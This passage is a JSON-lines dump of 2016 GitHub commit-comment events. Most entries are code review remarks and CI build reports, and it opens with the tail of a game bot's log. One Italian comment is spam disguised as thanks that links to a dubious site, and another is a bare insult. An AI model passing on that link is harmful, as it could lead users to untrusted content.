Scene: Lobby\r\n[12:35:15 AM]  Scene: Battle Modes\r\n[12:35:16 AM]  Scene: Arena Ready\r\n[12:35:17 AM]  Scene: Arena Start\r\n[12:35:18 AM]  Scene: Mastery Popup\r\n[12:35:19 AM]  Scene: Arena Start\r\n[12:35:20 AM]  Scene: Out Of Swords Popup\r\n[12:35:20 AM]  Changing objective to: Raid\r\n[12:35:22 AM]  Scene: Arena Start\r\n[12:35:23 AM]  Scene: Arena Ready\r\n[12:35:24 AM]  Scene: Battle Modes\r\n[12:35:25 AM]  Scene: Lobby\r\n[12:35:26 AM]  Scene: Adventure Modes\r\n[12:35:27 AM]  Scene: Raid Lobby\r\n[12:35:27 AM]  Changing objective to: Adventure\r\n[12:35:28 AM]  Scene: Adventure Modes\r\n[12:35:29 AM]  Scene: Map Select\r\n[12:35:33 AM]  Scene: Adventure Ready\r\n[12:35:33 AM]  Scene: Adventure Start\r\n[12:35:34 AM]  Scene: Mastery Popup\r\n[12:35:36 AM]  Scene: Adventure Start\r\n[12:35:37 AM]  Scene: Map Select\r\n[12:35:42 AM]  Scene: Adventure Ready\r\n[12:35:42 AM]  Scene: Adventure Start\r\n[12:35:45 AM]  Scene: Adventure Fight\r\n[12:35:47 AM]  @ Wave 1\r\n[12:36:08 AM]  @ Wave 2\r\n[12:36:49 AM]  Scene: Victory\r\n[12:36:58 AM]  Scene: Adventure Loot\r\n[12:37:03 AM]  Scene: Adventure Start\r\n[12:37:04 AM]  Scene: Map Select\r\n[12:37:09 AM]  Scene: Adventure Ready\r\n[12:37:10 AM]  Scene: Adventure Start\r\n[12:37:12 AM]  Scene: Adventure Fight\r\n[12:37:15 AM]  @ Wave 1\r\n[12:37:32 AM]  @ Wave 2\r\n"}},"created_at":"2016-09-27T16:38:09Z"}
{"id":"4625426737","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19193741,"position":36,"line":39,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-27T16:38:10Z","updated_at":"2016-09-27T16:38:10Z","body":"Hey you are stupid"}},"created_at":"2016-09-27T16:38:10Z"}
{"id":"4625428904","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193747,"position":24,"line":306,"path":"src/couch_db_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:38:31Z","updated_at":"2016-09-27T16:38:31Z","body":"I'd reword this slightly. Special care seems excessive when we're giving the list as an argument to the function. However it is good to note that non-tail-append engines may have to remove them specifically rather than rely on compaction to remove them."}},"created_at":"2016-09-27T16:38:31Z"}
{"id":"4625430405","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193749,"position":39,"line":321,"path":"src/couch_db_engine.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:38:45Z","updated_at":"2016-09-27T16:38:45Z","body":"NIt: One too many blank lines."}},"created_at":"2016-09-27T16:38:45Z"}
{"id":"4625434416","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":19193755,"position":null,"line":null,"path":null,"commit_id":"ba69a304ceb455be51298cbdb725ea021fb62f4d","created_at":"2016-09-27T16:39:25Z","updated_at":"2016-09-27T16:39:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HJG3Noa8Ts22Moi-bOMrGQ"}},"created_at":"2016-09-27T16:39:25Z"}
{"id":"4625441173","type":"CommitCommentEvent","actor":{"login":"Ale1994"},"repo":{"name":"rafolo89/Esame"},"payload":{"comment":{"id":19193772,"position":null,"line":null,"path":null,"commit_id":"cf12aa200ab771dc124401db6ef7c7b7e422eb9d","created_at":"2016-09-27T16:40:33Z","updated_at":"2016-09-27T16:40:33Z","body":"Salve,\r\n\r\n\r\nVolevo ringraziarvi per il vostro sostegno e condividere con voi  alcune informazioni interessanti, si possono trovare qui <http://alina.kinkyguides.com/zzc>\r\n\r\nSaluti,lessandra Orsi\r\n"}},"created_at":"2016-09-27T16:40:33Z"}
{"id":"4625450427","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19193795,"position":null,"line":null,"path":null,"commit_id":"d6505607eb7d275c6c52fd3179f1f2561eec92d0","created_at":"2016-09-27T16:42:09Z","updated_at":"2016-09-27T16:42:09Z","body":"doh, thanks for this! I always forget when I'm working on Windows, since it doesn't auto-run :smile: "}},"created_at":"2016-09-27T16:42:09Z"}
{"id":"4625453477","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193802,"position":107,"line":629,"path":"src/couch_db_updater.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:42:34Z","updated_at":"2016-09-27T16:42:34Z","body":"Nit: This should be indented one more level."}},"created_at":"2016-09-27T16:42:34Z"}
{"id":"4625459953","type":"CommitCommentEvent","actor":{"login":"Androkai"},"repo":{"name":"Androkai/LunaChat"},"payload":{"comment":{"id":19193812,"position":null,"line":null,"path":null,"commit_id":"cbbdfd0208e9d1f939f9d164a67a9f50b0ef9882","created_at":"2016-09-27T16:43:39Z","updated_at":"2016-09-27T16:43:39Z","body":"@ucchyocean \r\nIt's only a warning I found then building DiscordSRV (→ very low priority) and in your commit-history I saw it worked in the past so I tried to fix it and maybe learn something new. The problem comes from HeroChat beeing added the same way to HawkEye as HawkEye to LunaChat. To really fix it HeroChat must be correctly added to the HawkEye-pom. Maybe I will did this and send them a pull-request. Your solution looks also very interesting and seems to work."}},"created_at":"2016-09-27T16:43:39Z"}
{"id":"4625462756","type":"CommitCommentEvent","actor":{"login":"moskupols"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19193825,"position":25,"line":51,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"d688b5e37f6f2261ffe38d270a48a1facc8d5920","created_at":"2016-09-27T16:44:09Z","updated_at":"2016-09-27T16:44:09Z","body":"А почему это лучше? Если добавить новое значение в enum,  все switch'и, в которых надо это значение рассмотреть, нам подскажет компилятор. Собственно, switch без default — способ сказать компилятору, что мы хотим рассмотреть все возможные значения enum. С теми же способами, которые вы предлагаете, придётся рассчитывать, что тесты,  содержащие новое значение enum, покрывают все случаи, в которых кто-то решил использовать такой converter или `switch` с `default: assert(false)`.\r\n\r\nЯ согласен, что в рантайме программа тоже должна падать при неожиданном/новом значении енума. Подытожу поведение разных подходов в этой ситуации.\r\n- converter вовсе не упадёт. будет то же самое, что switch без default, только ещё и без предупреждений.\r\n- `switch` с `default` упадёт, если поймаем на тестах.\r\n- `switch` без `default` не упадёт, но тот же `assert` или `throw` можно сделать сразу после `switch`, если ни один из кейсов не выполнился. Для этого удобно помещать switch в отдельную функцию и делать `return` в каждом кейсе. Если так сделать, то и компилятор предупредит, и на тестах, может быть, упадёт."}},"created_at":"2016-09-27T16:44:09Z"}
{"id":"4625465412","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193835,"position":109,"line":631,"path":"src/couch_db_updater.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:44:37Z","updated_at":"2016-09-27T16:44:37Z","body":"Nit: Another missing indent"}},"created_at":"2016-09-27T16:44:37Z"}
{"id":"4625469911","type":"CommitCommentEvent","actor":{"login":"monster1991"},"repo":{"name":"monster1991/FFXIV-Zodiac-Glass"},"payload":{"comment":{"id":19193842,"position":null,"line":null,"path":null,"commit_id":"286aefc4182f66ea224d19508ac52591a208a24b","created_at":"2016-09-27T16:45:25Z","updated_at":"2016-09-27T16:45:25Z","body":"For DX9"}},"created_at":"2016-09-27T16:45:25Z"}
{"id":"4625470501","type":"CommitCommentEvent","actor":{"login":"Sharavanth"},"repo":{"name":"sivask94/react-table"},"payload":{"comment":{"id":19193846,"position":39,"line":41,"path":"public/scripts/Table.js","commit_id":"8ec0174eea869084cde515b6df17f19d587e9d8a","created_at":"2016-09-27T16:45:32Z","updated_at":"2016-09-27T16:45:32Z","body":"cannot use map function with an object"}},"created_at":"2016-09-27T16:45:32Z"}
{"id":"4625470942","type":"CommitCommentEvent","actor":{"login":"aleallopez"},"repo":{"name":"aleallopez/aleallopez.github.io"},"payload":{"comment":{"id":19193853,"position":null,"line":null,"path":null,"commit_id":"9ca4fe527c7fe33e3349b27dc488ea0f6dee87b0","created_at":"2016-09-27T16:45:36Z","updated_at":"2016-09-27T16:45:36Z","body":"<ol>\r\n<li> Las Vegas</li>\r\n<li>San Francisco</li>\r\n<li>Washington DC</li>\r\n<li>New York City</li>\r\n<li>Costa Rica\r\n<li>Europe</li>\r\n<li>Alaska</li>\r\n<li>Ecuador</li>\r\n<li>Greece</li>\r\n<li>Argentina</li>\r\n<li>Panama</li>\r\n</ol>"}},"created_at":"2016-09-27T16:45:36Z"}
{"id":"4625471104","type":"CommitCommentEvent","actor":{"login":"siliconsenthil"},"repo":{"name":"TWChennai/gocd-git-path-material-plugin"},"payload":{"comment":{"id":19193854,"position":4,"line":7,"path":"build.gradle","commit_id":"000348c96dd5dc7d26501b42673261a76a76b929","created_at":"2016-09-27T16:45:38Z","updated_at":"2016-09-27T16:45:38Z","body":"Done that. 👍 "}},"created_at":"2016-09-27T16:45:38Z"}
{"id":"4625474602","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19193864,"position":null,"line":null,"path":null,"commit_id":"46857f8e68f6ee35cb9a79c46cfc18115800d0e0","created_at":"2016-09-27T16:46:15Z","updated_at":"2016-09-27T16:46:15Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n- [Gruntfile.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/Gruntfile.js)\n- [composer.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/composer.json)\n- [package.json](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/package.json)\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_partials/footer_scripts.html)\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/default.html)\n- [source/_views/posts.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/posts.html)\n- [source/_views/taxon.html](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/_views/taxon.html)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/css/main.css)\n- [source/docs/assets/images/clippy.svg](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/images/clippy.svg)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.js)\n- [source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf](https://github.com/pantheon-systems/documentation/commit/0596b440bf60e72b8fe1a47f8438db6208788082/source/docs/assets/js/vendor/zeroclipboard/zeroclipboard/dist/ZeroClipboard.swf)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/be156db125f0de40f6031b913bd781daa9bc1396/source/_partials/terminus_navbar.html)\n"}},"created_at":"2016-09-27T16:46:15Z"}
{"id":"4625478610","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19193873,"position":null,"line":null,"path":null,"commit_id":"719fe5f49549d0e9844f52c483701045c1b17ea2","created_at":"2016-09-27T16:46:56Z","updated_at":"2016-09-27T16:46:56Z","body":"license-update (axelstudios) - x86_64-MacOS-10.10-clang: OK (2383 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-719fe5f49549d0e9844f52c483701045c1b17ea2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-719fe5f49549d0e9844f52c483701045c1b17ea2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.34%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T16:46:56Z"}
{"id":"4625480081","type":"CommitCommentEvent","actor":{"login":"aleallopez"},"repo":{"name":"aleallopez/aleallopez.github.io"},"payload":{"comment":{"id":19193877,"position":null,"line":null,"path":null,"commit_id":"9ca4fe527c7fe33e3349b27dc488ea0f6dee87b0","created_at":"2016-09-27T16:47:11Z","updated_at":"2016-09-27T16:47:11Z","body":"<iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/hNvREDxJops\" frameborder=\"0\" allowfullscreen></iframe>"}},"created_at":"2016-09-27T16:47:11Z"}
{"id":"4625480207","type":"CommitCommentEvent","actor":{"login":"changtengfei"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19193878,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-27T16:47:12Z","updated_at":"2016-09-27T16:47:12Z","body":"@OnsetJon the following are the only two line code which will call openqueue_removeAllCreatedBy(COMPONENT_ICMPv6RPL)\r\nand both them set the busySendingDIO and busySendingDAO as False right after.  \r\n\r\nhttps://github.com/openwsn-berkeley/openwsn-fw/blob/develop/openstack/03b-IPv6/icmpv6rpl.c#L526\r\nhttps://github.com/openwsn-berkeley/openwsn-fw/blob/develop/openstack/03b-IPv6/icmpv6rpl.c#L642"}},"created_at":"2016-09-27T16:47:12Z"}
{"id":"4625482250","type":"CommitCommentEvent","actor":{"login":"mmaechler"},"repo":{"name":"emacs-ess/ESS"},"payload":{"comment":{"id":19193880,"position":null,"line":null,"path":null,"commit_id":"91e52266bce107cd57f051dd0d75fc398e4a8124","created_at":"2016-09-27T16:47:33Z","updated_at":"2016-09-27T16:47:33Z","body":"indeed!"}},"created_at":"2016-09-27T16:47:33Z"}
{"id":"4625483843","type":"CommitCommentEvent","actor":{"login":"aldimol"},"repo":{"name":"paypal/PayPal-PHP-SDK"},"payload":{"comment":{"id":19193884,"position":null,"line":null,"path":null,"commit_id":"c093d678f8e03b51b380054b061fe17c23483017","created_at":"2016-09-27T16:47:49Z","updated_at":"2016-09-27T16:47:49Z","body":"Изменился адрес доступа\n"}},"created_at":"2016-09-27T16:47:49Z"}
{"id":"4625493119","type":"CommitCommentEvent","actor":{"login":"DerekStride"},"repo":{"name":"isyed867/SYSC3110_Lab"},"payload":{"comment":{"id":19193900,"position":7,"line":7,"path":"src/BuddyInfo.java","commit_id":"2908d0e1dc598350af7832e4360cf751fbb5ea86","created_at":"2016-09-27T16:49:20Z","updated_at":"2016-09-27T16:49:20Z","body":"I suggest making the scope of buddyName private instead of package."}},"created_at":"2016-09-27T16:49:20Z"}
{"id":"4625495875","type":"CommitCommentEvent","actor":{"login":"hungphamuy95"},"repo":{"name":"hungphamuy95/ISD"},"payload":{"comment":{"id":19193905,"position":null,"line":null,"path":null,"commit_id":"57af2f30bfcd867af481260253ae92898487b789","created_at":"2016-09-27T16:49:48Z","updated_at":"2016-09-27T16:49:48Z","body":"tuấn thêm cái gì đấy ✌️ "}},"created_at":"2016-09-27T16:49:48Z"}
{"id":"4625496031","type":"CommitCommentEvent","actor":{"login":"aleallopez"},"repo":{"name":"aleallopez/aleallopez.github.io"},"payload":{"comment":{"id":19193906,"position":null,"line":null,"path":null,"commit_id":"9ca4fe527c7fe33e3349b27dc488ea0f6dee87b0","created_at":"2016-09-27T16:49:50Z","updated_at":"2016-09-27T16:49:50Z","body":"[https://youtu.be/hNvREDxJops](url)"}},"created_at":"2016-09-27T16:49:50Z"}
{"id":"4625497594","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193909,"position":86,"line":260,"path":"src/test_engine_compaction.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:50:06Z","updated_at":"2016-09-27T16:50:06Z","body":"Can you comment what you're expecting to happen and why on each of these finish_compaction calls that start a new compaction. Given you don't do anything before the finish_compaction on line 248 I'm confused why this second one thinks it needs to recompact."}},"created_at":"2016-09-27T16:50:06Z"}
{"id":"4625499197","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19193913,"position":null,"line":null,"path":null,"commit_id":"c2f9c350dea682afcf25c8440110d870e23985e8","created_at":"2016-09-27T16:50:21Z","updated_at":"2016-09-27T16:50:21Z","body":"@danbucholtz, why demos reference `ionic-angular@2.0.0-beta.11-201609161747`, should they use rc0?\r\n\r\nAlso `UNMET PEER DEPENDENCY zone.js@^0.6.21`\r\n```\r\nstarting npm install ...\r\nionic-demos@1.0.0 /home/ubuntu/ionic/demos\r\n├─┬ @angular/compiler-cli@0.6.2 \r\n│ ├─┬ @angular/tsc-wrapped@0.3.0 \r\n│ │ └─┬ tsickle@0.1.7 \r\n│ │   ├─┬ mkdirp@0.5.1 \r\n│ │   │ └── minimist@0.0.8 \r\n│ │   ├─┬ source-map@0.4.4 \r\n│ │   │ └── amdefine@1.0.0 \r\n│ │   └─┬ source-map-support@0.3.3 \r\n│ │     └── source-map@0.1.32 \r\n│ ├── minimist@1.2.0 \r\n│ ├── parse5@1.3.2 \r\n│ └── reflect-metadata@0.1.8 \r\n├─┬ ionic-angular@2.0.0-beta.11-201609161747 \r\n│ ├── @angular/common@2.0.1 \r\n│ ├── @angular/compiler@2.0.1 \r\n│ ├── @angular/core@2.0.1 \r\n│ ├── @angular/forms@2.0.1 \r\n│ ├── @angular/http@2.0.1 \r\n│ ├── @angular/platform-browser@2.0.1 \r\n│ ├── @angular/platform-browser-dynamic@2.0.1 \r\n│ ├── @angular/platform-server@2.0.1 \r\n│ ├── rxjs-es@5.0.0-beta.12 \r\n│ └── UNMET PEER DEPENDENCY zone.js@^0.6.21\r\n├── ionicons@3.0.0 \r\n├─┬ rxjs@5.0.0-beta.12 \r\n│ └── symbol-observable@1.0.2 \r\n└── typescript@2.0.2 \r\n```"}},"created_at":"2016-09-27T16:50:21Z"}
{"id":"4625500052","type":"CommitCommentEvent","actor":{"login":"joerg-krause"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19193916,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:50:30Z","updated_at":"2016-09-27T16:50:30Z","body":"Does the new features require libalac?"}},"created_at":"2016-09-27T16:50:30Z"}
{"id":"4625500461","type":"CommitCommentEvent","actor":{"login":"nodeworks"},"repo":{"name":"nodeworks/formaturl"},"payload":{"comment":{"id":19193927,"position":null,"line":null,"path":null,"commit_id":"be65c5d1c35ba197659d761b4d6bc3c116709b2a","created_at":"2016-09-27T16:50:34Z","updated_at":"2016-09-27T16:50:34Z","body":"This code looks good"}},"created_at":"2016-09-27T16:50:34Z"}
{"id":"4625500546","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19193929,"position":null,"line":null,"path":null,"commit_id":"4c110ecff0bfbf3e2daa94e1272af1ecc97bb304","created_at":"2016-09-27T16:50:35Z","updated_at":"2016-09-27T16:50:35Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.269.4c110ecff0bfbf3e2daa94e1272af1ecc97bb304](http://build.palaso.org/viewLog.html?buildId=77157&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1289, ignored: 17 Build time: 00:08:04"}},"created_at":"2016-09-27T16:50:35Z"}
{"id":"4625500871","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193930,"position":4,"line":173,"path":"src/test_engine_purge_docs.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:50:39Z","updated_at":"2016-09-27T16:50:39Z","body":"You should squash out this whitespace only hunk."}},"created_at":"2016-09-27T16:50:39Z"}
{"id":"4625502434","type":"CommitCommentEvent","actor":{"login":"DeadneM"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19193936,"position":null,"line":null,"path":null,"commit_id":"4f8e151e5c37e2ceec100c82446b7b9089b29d87","created_at":"2016-09-27T16:50:55Z","updated_at":"2016-09-27T16:50:55Z","body":"be carreful as you removed f2fs mount point : i suggest https://gitlab.com/deadnem/Singularity-DeYuS/commit/84918c4aad3aee007fb996627a5408e6b4279cc6"}},"created_at":"2016-09-27T16:50:55Z"}
{"id":"4625502463","type":"CommitCommentEvent","actor":{"login":"ysq1051838264"},"repo":{"name":"ysq1051838264/UaMother"},"payload":{"comment":{"id":19193937,"position":8,"line":8,"path":"README.md","commit_id":"76d76f32809c96de49ebdc292424ef883cf86ac1","created_at":"2016-09-27T16:50:56Z","updated_at":"2016-09-27T16:50:56Z","body":"3"}},"created_at":"2016-09-27T16:50:56Z"}
{"id":"4625503180","type":"CommitCommentEvent","actor":{"login":"davisp"},"repo":{"name":"cloudant/couchdb-couch"},"payload":{"comment":{"id":19193938,"position":53,"line":287,"path":"src/test_engine_util.erl","commit_id":"c4cfeabd46916463cbb87749abcd75096fbe6f95","created_at":"2016-09-27T16:51:03Z","updated_at":"2016-09-27T16:51:03Z","body":"Nit: whitespace only hunk"}},"created_at":"2016-09-27T16:51:03Z"}
{"id":"4625506419","type":"CommitCommentEvent","actor":{"login":"tmathews"},"repo":{"name":"monstercat/deon"},"payload":{"comment":{"id":19193946,"position":6,"line":2846,"path":"public/css/style.css","commit_id":"400b4d12a034911aac8082451023618782d9de92","created_at":"2016-09-27T16:51:34Z","updated_at":"2016-09-27T16:51:34Z","body":"What does 'or' mean?"}},"created_at":"2016-09-27T16:51:34Z"}
{"id":"4625508077","type":"CommitCommentEvent","actor":{"login":"knispeja"},"repo":{"name":"peterlarson/cageOS"},"payload":{"comment":{"id":19193949,"position":null,"line":null,"path":null,"commit_id":"3f23d7339e4dce911fd91e1978783c6e261d543a","created_at":"2016-09-27T16:51:50Z","updated_at":"2016-09-27T16:51:50Z","body":"Neat"}},"created_at":"2016-09-27T16:51:50Z"}
{"id":"4625510524","type":"CommitCommentEvent","actor":{"login":"volumio"},"repo":{"name":"volumio/Build"},"payload":{"comment":{"id":19193955,"position":null,"line":null,"path":null,"commit_id":"5409190efbfacefe0c21b95a48b268921cc45516","created_at":"2016-09-27T16:52:13Z","updated_at":"2016-09-27T16:52:13Z","body":"To keep backward compatibility with old images, I restored the creation of the keys. \r\nThen at first boot, the keys are removed and regenerated... \r\nSince the firststart is launched only once (and already deployed images will not launch it again) its the only way to make it work..."}},"created_at":"2016-09-27T16:52:13Z"}
{"id":"4625511469","type":"CommitCommentEvent","actor":{"login":"mikebrady"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19193960,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:52:22Z","updated_at":"2016-09-27T16:52:22Z","body":"No – just don't include it in the `./configure` options and you'll have the original decoder by David Hammerton, as before."}},"created_at":"2016-09-27T16:52:22Z"}
{"id":"4625512691","type":"CommitCommentEvent","actor":{"login":"daschl"},"repo":{"name":"couchbaselabs/java-dcp-client"},"payload":{"comment":{"id":19193962,"position":21,"line":48,"path":"src/main/java/com/couchbase/client/dcp/message/DcpGetPartitionSeqnosRequest.java","commit_id":"14fa589b35e0a924bee1e0068b41b9669ad45db0","created_at":"2016-09-27T16:52:34Z","updated_at":"2016-09-27T16:52:34Z","body":"You need to release the unpooled buffer after set too I think. So assing to var and then release after set"}},"created_at":"2016-09-27T16:52:34Z"}
{"id":"4625512769","type":"CommitCommentEvent","actor":{"login":"raghuchowdareddy"},"repo":{"name":"enuminfo2016/york-farm"},"payload":{"comment":{"id":19193963,"position":null,"line":null,"path":null,"commit_id":"0bf6d2624957202b1a9fe7d22d3b07e31bafdfd1","created_at":"2016-09-27T16:52:35Z","updated_at":"2016-09-27T16:52:35Z","body":"why did you change the files back to old Siva?? it is hard to work man.. try to understand"}},"created_at":"2016-09-27T16:52:35Z"}
{"id":"4625513396","type":"CommitCommentEvent","actor":{"login":"tmathews"},"repo":{"name":"monstercat/deon"},"payload":{"comment":{"id":19193965,"position":6,"line":2846,"path":"public/css/style.css","commit_id":"400b4d12a034911aac8082451023618782d9de92","created_at":"2016-09-27T16:52:42Z","updated_at":"2016-09-27T16:52:42Z","body":"It would have been a better idea to use a child selector here."}},"created_at":"2016-09-27T16:52:42Z"}
{"id":"4625516671","type":"CommitCommentEvent","actor":{"login":"joerg-krause"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19193971,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T16:53:15Z","updated_at":"2016-09-27T16:53:15Z","body":"Is there any advantage in using libalac?"}},"created_at":"2016-09-27T16:53:15Z"}
{"id":"4625517090","type":"CommitCommentEvent","actor":{"login":"KrauseFx"},"repo":{"name":"KrauseFx/fastlane-plugin-no_u"},"payload":{"comment":{"id":19193973,"position":null,"line":null,"path":null,"commit_id":"afc8dc2055f6cd36fd2c9cf685d970122f1a735b","created_at":"2016-09-27T16:53:19Z","updated_at":"2016-09-27T16:53:19Z","body":"Should have rails as dependency"}},"created_at":"2016-09-27T16:53:19Z"}
{"id":"4625517337","type":"CommitCommentEvent","actor":{"login":"msimacek"},"repo":{"name":"fedora-java/xmvn"},"payload":{"comment":{"id":19193974,"position":6,"line":167,"path":"xmvn-it/pom.xml","commit_id":"374823375c730a36540baa329104f4fe2794b772","created_at":"2016-09-27T16:53:21Z","updated_at":"2016-09-27T16:53:21Z","body":"I don't see :takari-concurrent-localrepo provided by anything in Fedora. To be able to run ITs during RPM build, I'd suggest picking different extension (tycho-pomless? it should be in different IT already)"}},"created_at":"2016-09-27T16:53:21Z"}
{"id":"4625519039","type":"CommitCommentEvent","actor":{"login":"deviator"},"repo":{"name":"rejectedsoftware/vibe.d"},"payload":{"comment":{"id":19193981,"position":10,"line":26,"path":"source/vibe/db/mongo/flags.d","commit_id":"90fd882956826019143a2c684b70e7ecd8fe3e87","created_at":"2016-09-27T16:53:39Z","updated_at":"2016-09-27T16:53:39Z","body":"no comma"}},"created_at":"2016-09-27T16:53:39Z"}
{"id":"4625519437","type":"CommitCommentEvent","actor":{"login":"vicehope"},"repo":{"name":"vicehope/JC"},"payload":{"comment":{"id":19193984,"position":14,"line":1557,"path":"jc.html","commit_id":"61bcdcfbdafb2f9b590b22d5f0abfb85d3c6015d","created_at":"2016-09-27T16:53:43Z","updated_at":"2016-09-27T16:53:43Z","body":"new tab <div> element."}},"created_at":"2016-09-27T16:53:43Z"}
{"id":"4625522420","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19193988,"position":null,"line":null,"path":null,"commit_id":"e4869fc8468c5490580b0fe45951c96e63c82c5e","created_at":"2016-09-27T16:54:12Z","updated_at":"2016-09-27T16:54:12Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.270.e4869fc8468c5490580b0fe45951c96e63c82c5e](http://build.palaso.org/viewLog.html?buildId=77158&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1498, ignored: 17 Build time: 00:07:46"}},"created_at":"2016-09-27T16:54:12Z"}
